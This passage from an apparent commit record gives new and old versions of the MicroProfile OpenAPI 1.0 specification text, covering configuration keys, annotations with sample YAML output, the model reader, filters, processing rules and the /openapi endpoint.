exceptions:\n\n1. All filterable descendant elements of a filtered element must be called before its ancestor.\n2. The `filterOpenAPI` method must be the *last* method called on a filter (which\nis just a specialization of the first exception).\n
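\nFor illustration, a skeletal filter matching the sample configuration above could look like this (the `filterPathItem` body is only an example; returning the received element leaves it unchanged):\n\n[source,java]\n----\npackage com.mypackage;\n\nimport org.eclipse.microprofile.openapi.OASFilter;\nimport org.eclipse.microprofile.openapi.models.PathItem;\n\npublic class MyFilter implements OASFilter {\n\n    \/\/ Only override the callbacks you care about; all other elements\n    \/\/ pass through the default no-op implementations\n    @Override\n    public PathItem filterPathItem(PathItem pathItem) {\n        \/\/ Inspect or modify the element and its descendants, then return it\n        return pathItem;\n    }\n}\n----\n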
If\nan `OASModelReader` was specified in that configuration list, its `buildModel`\nmethod is called to form the starting OpenAPI model tree for this application.\n* Any <<Vendor specific configuration>> values are added on top of that starting model (overriding\nconflicts), or are used to create a new model if an `OASModelReader` was not registered.\n* The vendor searches for a file as defined in the section <<Static OpenAPI files>>.\nIf found, it will read that document and merge it with the model produced by previous\nprocessing steps (if any), where conflicting elements from the static file will override\nthe values from the original model.\n* If annotation scanning was not disabled, the JAX-RS and OpenAPI annotations from\nthe application will be processed, further overriding any conflicting elements\nfrom the current model.\n* The final model is filtered by walking the model tree and invoking all registered\n<<OASFilter>> classes.\n\n== OpenAPI Endpoint\n\n=== Overview\nA fully processed and valid OpenAPI document must be available at the root\nURL `\/openapi`, as an `HTTP GET` operation.\n\nFor example, `GET http:\/\/myHost:myPort\/openapi`.\n\nThis document represents the result of the applied <<Processing rules>>.\n\nThe protocol required is `http`. Vendors are encouraged, but not required, to\nsupport the `https` protocol as well, to enable a secure connection to the OpenAPI\nendpoint.\n\n=== Content format\nThe default format of the `\/openapi` endpoint is `YAML`.\n\nVendors must also support the `JSON` format if the request contains an `Accept`\nheader with a value of `application\/json`, in which case the response must contain\na `Content-Type` header with a value of `application\/json`.\n\n=== Query parameters\nNo query parameters are required for the `\/openapi` endpoint. However, one\nsuggested but optional query parameter for vendors to support is `format`,\nwhere the value can be either `json` or `yaml`, to facilitate the toggle between\nthe default `yaml` format and the `json` format.\n\n=== Context root behaviour\nVendors are required to ensure that the combination of each global https:\/\/github.com\/OAI\/OpenAPI-Specification\/blob\/master\/versions\/3.0.0.md#serverObject[server]\nelement and https:\/\/github.com\/OAI\/OpenAPI-Specification\/blob\/master\/versions\/3.0.0.md#pathItemObject[pathItem] element resolves to the absolute backend URL of that\nparticular path. If that `pathItem` contains a `servers` element, then this\nlist of operation-level `server` elements replaces the global list of servers\nfor that particular `pathItem`.\n\nFor example: an application may have an `ApplicationPath` annotation with the\nvalue of `\/`, but is assigned the context root of `\/myApp` during deployment. In\nthis case, the `server` elements (either global or operation-level) must either\nend with `\/myApp` or point to a corresponding proxy. Alternatively, it is valid, but discouraged, to\nadd that context root (`\/myApp`) to every `pathItem` defined in that application.\n\n=== Multiple applications\n\nThe 1.0 version of the MicroProfile OpenAPI specification does not define how\nthe `\/openapi` endpoint may be partitioned in the event that the MicroProfile\nruntime supports deployment of multiple applications. 
If an implementation wishes\nto support multiple applications within a MicroProfile runtime, the semantics of\nthe `\/openapi` endpoint are expected to be the logical AND of all the applications\nin the runtime, which would imply merging multiple OpenAPI documents into a single\nvalid document (handling conflicting IDs and unique names).\n\n\n== Limitations\n\n=== Internationalization\nThe 1.0 version of the MicroProfile OpenAPI spec does not require vendors to\nsupport multiple languages based on the `Accept-Language`. One reasonable\napproach is for vendors to support unique keys (instead of hardcoded text) via\nthe various <<Documentation Mechanisms>>, so that the implementing framework can\nperform a global replacement of the keys with the language-specific text that\nmatches the `Accept-Language` request for the `\/openapi` endpoint. A cache of\nprocessed languages can be kept to improve performance.\n\n=== Validation\n\nThe MP OpenAPI 1.0 specification does not mandate vendors to validate the resulting\nOpenAPI v3 model (after processing the 5 steps previously mentioned), which means\nthat the behavior of invalid models is vendor specific (i.e. vendors may choose to\nignore, reject, or pass-through invalid inputs).\n\n=== Cross Origin Resource Sharing (CORS)\n\nThe MP OpenAPI 1.0 specification does not require vendors to support https:\/\/www.w3.org\/TR\/cors\/[CORS]\nfor the `\/openapi` endpoint. The behavior of CORS requests is implementation dependent.\n\ninclude::release_notes.asciidoc[]\n","old_contents":"\/\/\n\/\/ Copyright (c) 2017 Contributors to the Eclipse Foundation\n\/\/\n\/\/ See the NOTICE file(s) distributed with this work for additional\n\/\/ information regarding copyright ownership.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\n\n:version-label!:\n:sectanchors:\n:doctype: book\n:license: Apache License v2.0\n:source-highlighter: coderay\n:sectnums:\n:toc: left\n:toclevels: 4\nifdef::backend-pdf[]\n:pagenums:\nendif::[]\n\ninclude::license-alv2.asciidoc[]\n\n= MicroProfile OpenAPI Specification\n\n== Introduction\nExposing APIs has become an essential part of all modern applications. At the\ncenter of this revolution known as the API Economy we find RESTful APIs, which can\ntransform any application into language agnostic services that can be called from\nanywhere: on-premises, private cloud, public cloud, etc.\n\nFor the clients and providers of these services to connect there needs to be a\nclear and complete contract. 
Similar to the WSDL contract for legacy Web Services,\nthe https:\/\/github.com\/OAI\/OpenAPI-Specification\/blob\/master\/versions\/3.0.0.md[OpenAPI v3] specification is the contract for\nRESTful Services.\n\nThis MicroProfile specification, called OpenAPI 1.0, aims to provide a set of Java\ninterfaces and programming models which allow Java developers to natively produce\nOpenAPI v3 documents from their JAX-RS applications.\n\n== Architecture\n\nThere are different ways to augment a JAX-RS application in order to produce an\nOpenAPI document, which are described in <<Documentation Mechanisms>>. The picture\nbelow provides a quick overview of the different types of components that make up\nthe MP OpenAPI specification:\n\n:imagesdir: images\nimage::diagram.png[Architecture Diagram]\n\nThe remaining sections of this specification will go into the details of each component.\n\n== Configuration\n\nConfiguration of various parts of this specification is provided via the https:\/\/github.com\/eclipse\/microprofile-config[MicroProfile Config] mechanism,\nwhich means that vendors implementing the MP OpenAPI specification must also implement\nthe MP Config specification.\n\nThere are various ways to inject these configuration values into an MP OpenAPI\nframework, including the https:\/\/github.com\/eclipse\/microprofile-config\/blob\/master\/spec\/src\/main\/asciidoc\/configsources.asciidoc#default-configources[default ConfigSource] as well as\nhttps:\/\/github.com\/eclipse\/microprofile-config\/blob\/master\/spec\/src\/main\/asciidoc\/configsources.asciidoc#custom-configsources[custom ConfigSource].\n\nVendors implementing the MP OpenAPI specification can optionally provide additional native\nways for these configuration values to be injected into the framework\n(e.g. via a server configuration file), as long as they also implement the MP Config\nspecification.\n\n\n=== List of configurable items\n\nVendors must support all the <<Core configurations>> of this specification.\nOptionally, they may also support <<Vendor extensions>> that allow the configuration of\nframework-specific values for configurations that affect implementation behavior.\n\nFor convenience of vendors (and application developers using custom ConfigSources),\nthe full list of supported configuration keys is available as constants in the\nhttps:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASConfig.java[OASConfig] class.\n\n==== Core configurations\n\nThe following is a list of configuration values that every vendor must support.\n\n[cols=\"1,4\"]\n|===\n| Config key | Value description\n\n| `mp.openapi.model.reader` | Configuration property to specify the fully qualified name of the <<OASModelReader>> implementation.\n| `mp.openapi.filter` | Configuration property to specify the fully qualified name of the <<OASFilter>> implementation.\n| `mp.openapi.scan.disable` | Configuration property to disable annotation scanning. Default value is `false`.\n| `mp.openapi.scan.packages` | Configuration property to specify the list of packages to scan. For example,\n`mp.openapi.scan.packages=com.xyz.PackageA,com.xyz.PackageB`\n| `mp.openapi.scan.classes` | Configuration property to specify the list of classes to scan. For example,\n`mp.openapi.scan.classes=com.xyz.MyClassA,com.xyz.MyClassB`\n| `mp.openapi.scan.exclude.packages` | Configuration property to specify the list of packages to exclude from scans. 
For example,\n`mp.openapi.scan.exclude.packages=com.xyz.PackageC,com.xyz.PackageD`\n| `mp.openapi.scan.exclude.classes` | Configuration property to specify the list of classes to exclude from scans. For example,\n`mp.openapi.scan.exclude.classes=com.xyz.MyClassC,com.xyz.MyClassD`\n| `mp.openapi.servers` | Configuration property to specify the list of global servers that provide connectivity information. For example,\n`mp.openapi.servers=https:\/\/xyz.com\/v1,https:\/\/abc.com\/v1`\n| `mp.openapi.servers.path.` | Prefix of the configuration property to specify an alternative list of servers to service all operations in a path. For example,\n`mp.openapi.servers.path.\/airlines\/bookings\/{id}=https:\/\/xyz.io\/v1`\n| `mp.openapi.servers.operation.` | Prefix of the configuration property to specify an alternative list of servers to service an operation.\nOperations that want to specify an alternative list of servers must define an `operationId`, a unique string used to identify the operation. For example,\n`mp.openapi.servers.operation.getBooking=https:\/\/abc.io\/v1`\n|===\n\n==== Vendor extensions\n\nVendors that wish to provide vendor-specific configuration via MP Config (instead\nof another native configuration framework) must use the prefix `mp.openapi.extensions`.\n\n== Documentation Mechanisms\n\nThere are many different ways to provide input for the generation of the resulting\nOpenAPI document.\n\nThe MP OpenAPI specification requires vendors to produce a valid OpenAPI document\nfrom pure JAX-RS 2.0 applications. This means that vendors must process all the\nrelevant JAX-RS annotations (such as `@Path` and `@Consumes`) as well as Java objects\n(POJOs) used as input or output to JAX-RS operations. This is a good place to\nstart for application developers that are new to OpenAPI: just deploy your existing\nJAX-RS application into a MP OpenAPI vendor and check out the output from `\/openapi`!\n\nThe application developer then has a few choices:\n\n1. Augment those JAX-RS annotations with the\nOpenAPI <<Annotations>>. Using annotations means\ndevelopers don't have to re-write the portions of the OpenAPI document that are\nalready covered by the JAX-RS framework (e.g. the HTTP method of an operation).\n\n2. Take the initial output from `\/openapi` as a starting point to document\nyour APIs via <<Static OpenAPI files>>. It's worth mentioning that these static\nfiles can also be written before any code, which is an approach often adopted by\nenterprises that want to lock-in the contract of the API. In this case, we refer\nto the OpenAPI document as the \"source of truth\", by which the client and provider\nmust abide.\n\n3. 
Use the <<Programming model>> to provide a bootstrap (or complete)\nOpenAPI model tree.\n\nAdditionally, a <<Filter>> is described which can update the OpenAPI model after it has\nbeen built from the previously described documentation mechanisms.\n\n=== Annotations\n\nMany of these OpenAPI v3 annotations were derived from the https:\/\/github.com\/swagger-api\/swagger-core[Swagger Core] library, which\nallows for a mostly-mechanical transformation of applications that are using that\nlibrary and wish to take advantage to the official MP OpenAPI interfaces.\n\n==== Quick overview of annotations\n\nThe following annotations are found in the https:\/\/github.com\/eclipse\/microprofile-open-api\/tree\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations[org.eclipse.microprofile.openapi.annotations] package.\n\n[cols=\"1,4\"]\n|===\n| Annotation | Description\n\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/callbacks\/Callback.java[@Callback] | Represents a callback URL that will be invoked.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/callbacks\/Callbacks.java[@Callbacks] | Represents an array of Callback URLs that can be invoked.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/callbacks\/CallbackOperation.java[@CallbackOperation] | Represents an operation that will be invoked during the callback.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/Components.java[@Components] | A container that holds various reusable objects for different aspects of the OpenAPI Specification.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/Explode.java[@Explode] | Enumeration used to define the value of the `explode` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/ParameterIn.java[@ParameterIn] | Enumeration representing the parameter's `in` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/ParameterStyle.java[@ParameterStyle] | Enumeration for the parameter's `style` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/SecuritySchemeIn.java[@SecuritySchemeIn] | Enumeration for the security scheme's `in` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/SecuritySchemeType.java[@SecuritySchemeType] | Enumeration for the security scheme's `type` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/extensions\/Extension.java[@Extension] | Adds an extension with contained properties.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/extension\/Extensions.java[@Extensions] | Adds custom 
properties to an extension.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/ExternalDocumentation.java[@ExternalDocumentation] | References an external resource for extended documentation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/headers\/Header.java[@Header] | Describes a single header object.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/info\/Contact.java[@Contact] | Contact information for the exposed API.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/info\/Info.java[@Info] | This annotation encapsulates metadata about the API.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/info\/License.java[@License] | License information for the exposed API.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/links\/Link.java[@Link] | Represents a design-time link for a response.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/links\/LinkParameter.java[@LinkParameter] | Represents a parameter to pass to the linked operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/Content.java[@Content] | Provides schema and examples for a particular media type.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/DiscriminatorMapping.java[@DiscriminatorMapping] | Used to differentiate between other schemas which may satisfy the payload description.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/Encoding.java[@Encoding] | Single encoding definition to be applied to single Schema Object.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/ExampleObject.java[@ExampleObject] | Illustrates an example of a particular content.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/Schema.java[@Schema] | Allows the definition of input and output data types.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/OpenAPIDefinition.java[@OpenAPIDefinition] | General metadata for an OpenAPI definition.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/Operation.java[@Operation] | Describes an operation or typically a HTTP method against a specific path.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/parameters\/Parameter.java[@Parameter] | Describes a single operation parameter.\n| 
https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/parameters\/Parameters.java[@Parameters] | Encapsulates input parameters.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/parameters\/RequestBody.java[@RequestBody] | Describes a single request body.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/response\/APIResponse.java[@APIResponse] | Describes a single response from an API operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/response\/APIResponses.java[@APIResponses] | A container for multiple responses from an API operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/OAuthFlow.java[@OAuthFlow] | Configuration details for a supported OAuth Flow.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/OAuthFlows.java[@OAuthFlows] | Allows configuration of the supported OAuth Flows.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/OAuthScope.java[@OAuthScope] | Represents an OAuth scope.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityRequirement.java[@SecurityRequirement] | Specifies a security requirement for an operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityRequirements.java[@SecurityRequirements] | Represents an array of security requirements where only one needs to be satisfied.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityRequirementsSet.java[@SecurityRequirementsSet] | Represents an array of security requirements that need to be satisfied.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityScheme.java[@SecurityScheme] | Defines a security scheme that can be used by the operations.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecuritySchemes.java[@SecuritySchemes] | Represents an array of security schemes that can be specified.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/servers\/Server.java[@Server]| Represents a server used in an operation or used by all operations in an OpenAPI document.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/servers\/Servers.java[@Servers] | A container for multiple server definitions.\n| 
https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/servers\/ServerVariable.java[@ServerVariable] | Represents a server variable for server URL template substitution.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/tags\/Tag.java[@Tag] | Represents a tag for the API endpoint.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/tags\/Tags.java[@Tags] | A container of multiple tags.\n|===\n\n==== Detailed usage of key annotations\n\n===== Operation\n\n.Sample 1 - Simple operation description\n[source,Java]\n----\n@GET\n@Path(\"\/findByStatus\")\n@Operation(summary = \"Finds Pets by status\",\n description = \"Multiple status values can be provided with comma separated strings\")\npublic Response findPetsByStatus(...) { ... }\n----\n\n.Output for Sample 1\n[source, yaml]\n----\n\/pet\/findByStatus:\n get:\n summary: Finds Pets by status\n description: Multiple status values can be provided with comma separated strings\n operationId: findPetsByStatus\n----\n\n.Sample 2 - Operation with different responses\n[source,Java]\n----\n@GET\n@Path(\"\/{username}\")\n@Operation(summary = \"Get user by user name\")\n@APIResponse(description = \"The user\",\n content = @Content(mediaType = \"application\/json\",\n schema = @Schema(implementation = User.class))),\n@APIResponse(responseCode = \"400\", description = \"User not found\")\npublic Response getUserByName(\n @Parameter(description = \"The name that needs to be fetched. Use user1 for testing. \", required = true) @PathParam(\"username\") String username)\n {...}\n----\n\n.Output for Sample 2\n[source, yaml]\n----\n\/user\/{username}:\n get:\n summary: Get user by user name\n operationId: getUserByName\n parameters:\n - name: username\n in: path\n description: 'The name that needs to be fetched. Use user1 for testing. '\n required: true\n schema:\n type: string\n responses:\n default:\n description: The user\n content:\n application\/json:\n schema:\n $ref: '#\/components\/schemas\/User'\n 400:\n description: User not found\n----\n\n\n===== RequestBody\n\n\n.Sample 1 - Simple RequestBody\n[source,Java]\n----\n@POST\n@Path(\"\/user\")\n@Operation(summary = \"Create user\",\n description = \"This can only be done by the logged in user.\")\npublic Response methodWithRequestBody(\n @RequestBody(description = \"Created user object\", required = true,\n content = @Content(schema = @Schema(implementation = User.class))) User user,\n @QueryParam(\"name\") String name, @QueryParam(\"code\") String code)\n { ... 
}\n----\n\n.Output for Sample 1\n[source, yaml]\n----\npost:\n summary: Create user\n description: This can only be done by the logged in user.\n operationId: methodWithRequestBody\n parameters:\n - name: name\n in: query\n schema:\n type: string\n - name: code\n in: query\n schema:\n type: string\n requestBody:\n description: Created user object\n content:\n '*\/*':\n schema:\n $ref: '#\/components\/schemas\/User'\n required: true\n responses:\n default:\n description: no description\n----\n\n===== Servers\n\n.Sample 1 - Extended Server scenarios\n[source,Java]\n----\n@OpenAPIDefinition(\n servers = {\n @Server(\n description = \"definition server 1\",\n url = \"http:\/\/{var1}.definition1\/{var2}\",\n variables = {\n @ServerVariable(name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"}),\n @ServerVariable(name = \"var2\",\n description = \"var 2\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})})\n@Server(\n description = \"class server 1\",\n url = \"http:\/\/{var1}.class1\/{var2}\",\n variables = {\n @ServerVariable(\n name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"}),\n @ServerVariable(\n name = \"var2\",\n description = \"var 2\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})\n@Server(\n description = \"class server 2\",\n url = \"http:\/\/{var1}.class2\",\n variables = {\n @ServerVariable(\n name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})\npublic class ServersResource {\n\n @GET\n @Path(\"\/\")\n @Server(\n description = \"method server 1\",\n url = \"http:\/\/{var1}.method1\",\n variables = {\n @ServerVariable(\n name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})\n @Server(\n description = \"method server 2\",\n url = \"http:\/\/method2\"\n )\n public Response getServers() {\n return Response.ok().entity(\"ok\").build();\n }\n}\n----\n\n.Output for Sample 1\n[source, yaml]\n----\nopenapi: 3.0.0\nservers:\n- url: http:\/\/{var1}.definition1\/{var2}\n description: definition server 1\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n var2:\n description: var 2\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\npaths:\n \/:\n get:\n operationId: getServers\n responses:\n default:\n description: default response\n servers:\n - url: http:\/\/{var1}.class1\/{var2}\n description: class server 1\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n var2:\n description: var 2\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n - url: http:\/\/{var1}.class2\n description: class server 2\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n - url: http:\/\/{var1}.method1\n description: method server 1\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n - url: http:\/\/method2\n description: method server 2\n variables: {}\n----\n\n===== Schema\n\n.Sample 1 - Schema POJO\n[source,Java]\n----\n@Schema(name=\"MyBooking\", description=\"POJO that represents a booking.\")\npublic class Booking {\n @Schema(required = true, example = \"32126319\")\n private String airMiles;\n\n @Schema(required = true, example = \"window\")\n private String seatPreference;\n}\n----\n\n.Output for Sample 1\n[source, yaml]\n----\ncomponents:\n schemas:\n MyBooking:\n description: POJO that represents a booking.\n required:\n - airMiles\n - seatPreference\n type: 
object\n properties:\n airMiles:\n type: string\n example: \"32126319\"\n seatPreference:\n type: string\n example: window\n----\n\n\n.Sample 2 - Schema POJO reference\n[source,Java]\n----\n@POST\npublic Response createBooking(\n @RequestBody(description = \"Create a new booking.\",\n content = @Content(mediaType = \"application\/json\",\n schema = @Schema(implementation = Booking.class))) Booking booking) {\n----\n\n.Output for Sample 2\n[source, yaml]\n----\npost:\n operationId: createBooking\n requestBody:\n description: Create a new booking with the provided information.\n content:\n application\/json:\n schema:\n $ref: '#\/components\/schemas\/MyBooking'\n----\n\n\nFor more samples please see the https:\/\/github.com\/eclipse\/microprofile-open-api\/wiki[MicroProfile Wiki].\n\n=== Static OpenAPI files\n\nApplication developers may wish to include a pre-generated OpenAPI document that\nwas written separately from the code (e.g. with an editor such as https:\/\/editor.swagger.io\/[this]).\n\nDepending on the scenario, the document may be fully complete or partially complete.\nIf a document is fully complete then the application developer will want to set the\n`mp.openapi.scan.disable` configuration property to `true`. If a document is partially\ncomplete, then the application developer will need to augment the OpenAPI snippet\nwith annotations, programming model, or via the filter.\n\n==== Location and formats\n\nVendors are required to fetch a single document named `openapi` with an extension\nof `yml`, `yaml` or `json`, inside the application's `META-INF` folder. If there\nis more than one document found that matches one of these extensions the behavior\nof which file is chosen is undefined (i.e. each vendor may implement their own logic),\nwhich means that application developers should only place a single `openapi` document\ninto that folder.\n\n=== Programming model\n\nApplication developers are able to provide OpenAPI elements via Java POJOs. The\ncomplete set of models are found in the https:\/\/github.com\/eclipse\/microprofile-open-api\/tree\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/models[org.eclipse.microprofile.openapi.models] package.\n\n==== OASFactory\n\nThe https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASFactory.java[OASFactory] is used to create all of the elements of an OpenAPI tree.\n\nFor example, the following snippet creates a simple https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/models\/info\/Info.java[Info] element that contains a title, description, and version.\n\n[source,java]\n----\nOASFactory.createObject(Info.class).title(\"Airlines\").description(\"Airlines APIs\").version(\"1.0.0\");\n----\n\n==== OASModelReader\n\nThe https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASModelReader.java[OASModelReader] interface allows application developers to bootstrap the OpenAPI model tree\nused by the processing framework. 
To use it, simply create an implementation of\nthis interface and register it using the `mp.openapi.model.reader` configuration\nkey, where the value is the fully qualified name of the reader class.\n\n.Sample META-INF\/microprofile-config.properties\n[code,property]\n----\nmp.openapi.model.reader=com.mypackage.MyModelReader\n----\n\nSimilar to static files, the model reader can be used to provide either complete\nor partial model trees. If providing a complete OpenAPI model tree, application\ndevelopers should set the `mp.openapi.scan.disable` configuration to `true`.\nOherwise this partial model will be used as the base model during the processing\nof the other <<Documentation Mechanisms>>.\n\nVendors are required to call the OASReader a single time, in the order defined by\nthe <<Processing rules>> section. Only a single OASReader instance is allowed per\napplication.\n\n=== Filter\n\nThere are many scenarios where application developers may wish to update or remove\ncertain elements and fields of the OpenAPI document. This is done via a filter,\nwhich is called once after all other documentation mechanisms have completed.\n\n==== OASFilter\n\nThe https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASFilter.java[OASFilter] interface allows application developers\nto receive callbacks for various key OpenAPI elements. The interface has a default\nimplementation for every method, which allows application developers to only override\nthe methods they care about. To use it, simply create an implementation of\nthis interface and register it using the `mp.openapi.filter` configuration\nkey, where the value is the fully qualified name of the filter class.\n\n.Sample META-INF\/microprofile-config.properties\n[code,property]\n----\nmp.openapi.filter=com.mypackage.MyFilter\n----\n\nVendors are required to call all registered filters in the application (0..N) once\nfor each filtered element. For example, the method `filterPathItem` is\ncalled *for each* corresponding `PathItem` element in the model tree. This allows\napplication developers to filter the element and any of its descendants.\n\nThe order of filter methods called is undefined, with two exceptions:\n\n1. All filterable descendant elements of a filtered element must be called before its ancestor.\n2. The `filterOpenAPI` method must be the *last* method called on a filter (which\nis just a specialization of the first exception).\n\n=== Processing rules\n\nThe processed document available from the <<OpenAPI Endpoint>> is built from a variety of sources,\nwhich were outlined in the sub-headings of <<Documentation Mechanisms>>. 